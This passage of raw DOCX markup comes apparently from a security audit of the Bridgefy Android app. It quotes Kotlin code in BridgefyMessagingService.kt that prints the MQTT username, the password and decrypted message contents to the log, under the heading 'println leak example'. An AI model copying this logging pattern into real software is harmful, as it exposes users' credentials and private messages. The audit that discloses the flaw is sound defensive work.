    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createMqttConnectionOption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(userName:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>): MqttConnectOptions {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Username $userName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="49"/>
          <w:w w:val="150"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--- Password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="2112" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>newMessageArrived</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(message:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BfMqttMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message.message?.let { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2693" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Mqtt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${message.id}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/////</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>////// from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$from"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MainScope().launch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="3095" w:right="1544" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>decryptMessage(message.id,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>from).onSuccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ it?.let {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="3491" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageManager.insertDecryptedMessageId(message.id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="3491" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Decrypted message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>${String(it)}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/service/BridgefyMessagingSe rvice.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>leak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="0" w:right="7711" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>).onSuccess </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="7711" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>it?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Json.decodeFromString&lt;Payload&gt;(String(it))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
